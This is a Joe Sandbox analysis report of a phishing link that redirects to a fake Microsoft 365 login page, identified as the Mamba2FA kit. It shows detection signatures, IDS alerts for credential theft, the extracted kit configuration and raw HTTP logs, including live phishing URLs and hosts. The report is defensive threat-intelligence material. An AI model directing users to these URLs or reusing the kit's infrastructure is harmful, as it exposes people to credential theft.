Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d238

Overview

General Information

Sample URL:https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d238
Analysis ID:1555772
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 5816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2020,i,2763923009184806423,6999701321909879304,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d238" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"sv": "o365_1_nom", "rand": "U05HZXg=", "uid": "USER11112024U35111144"}
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.0.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T13:01:43.173206+010020563161Successful Credential Theft Detected192.168.2.449747192.254.232.133443TCP
          2024-11-14T13:01:44.800183+010020563161Successful Credential Theft Detected192.168.2.449750192.254.232.133443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T13:01:41.894533+010020566432Possible Social Engineering Attempted192.168.2.449746192.254.232.133443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T13:01:41.114666+010020573331Successful Credential Theft Detected192.168.2.449745192.254.232.133443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d238SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
          Source: 1.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_nom", "rand": "U05HZXg=", "uid": "USER11112024U35111144"}

          Phishing

          barindex
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: Number of links: 0
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: Title: Authenticating ... does not match URL
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: Invalid link: Forgot password?
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: <input type="password" .../> found
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: No favicon
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: No favicon
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49797 version: TLS 1.2

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2057333 - Severity 1 - ET PHISHING MAMBA Credential Phish Landing Page 2024-11-08 : 192.168.2.4:49745 -> 192.254.232.133:443
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49750 -> 192.254.232.133:443
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49747 -> 192.254.232.133:443
          Source: global trafficTCP traffic: 192.168.2.4:49683 -> 1.1.1.1:53
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: link.mail.beehiiv.com to https://factiv.za.com?utm_source=jeffs-newsletter-b696b2.beehiiv.com&utm_medium=newsletter&utm_campaign=a-new-chapter-in-qin-qio-healthcare-initiatives&_bhlid=d0004fb3ceb6d2f6e26427e761e06be86ee52a61
          Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.4:49746 -> 192.254.232.133:443
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.Gum4XCDwDfMXb6rJ3y3QBdDxM7nMOkZPDYDs-2Fn4WmtuPspPs1QqGUSOcILP8eRDkf7FonibETXe6kfp9hZMBuLLIsWyLPqBX3fqv7wiz-2BVqhEikbp2E-2FHaXJRKo48fhFNNEtQg6epBRi-2BMdKBZw5upKI6jE-2BR4F9nThzpezwBtIq3xsnOhp1jv8evTBHOgOEJSUeA-2FF-2FHmj6CIJtpbnsGltReMlyxyPflrIWboJRaiwxHQKDD305BUmDBr0XfHWdzbSVZPG5s5Q5aDjslzgXQGVQiRAf-2F6baexJshppt13Q-3DyLvz_pVu-2Bme9mTwi8mVEI1fxkMxbIV0ignfjjqHxVxnx9LwJUWDBaY-2FzFT-2Fe44lxkpYHb0-2FiAIIT14KZxdnbgbo-2FBfXfgOI1Vb7dplYipJDknsAMDy6MirKMWJLgumGepN8N7Uy1vPvXIxmVYzQwNevQkY3yvRn762WvkrylkaRmnJXdcg9gL1zTVX5xx5qzRUtQ6e2JnpmrvGdZE-2BqNgLcQSVtnYKBGJGbo6m5lVbS8xxx7Ce6bGKqhllcz70sWr2hVP0fneTC0f5OmbCb1DEm2YXSXocIpmaeUDoG81RQhJo6PidbFG5P4Q05aEHhakAksKcNgcbk3wu16DUAfmjwXongASSgb2kSoPL-2FnjY0fXfPdf-2BJ5NWTE67A1Gxo4YYWT10KmEmGM38HjvJsvPz2WP-2Boa4OTENwch6qtrd8GRGJ2maI9xfnFjyKX5sy59jEQeq HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /?utm_source=jeffs-newsletter-b696b2.beehiiv.com&utm_medium=newsletter&utm_campaign=a-new-chapter-in-qin-qio-healthcare-initiatives&_bhlid=d0004fb3ceb6d2f6e26427e761e06be86ee52a61 HTTP/1.1Host: factiv.za.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123N HTTP/1.1Host: thewesteffect.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /n/jsnom.js HTTP/1.1Host: thewesteffect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://thewesteffect.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /n/jsnom.js HTTP/1.1Host: thewesteffect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: thewesteffect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: thewesteffect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
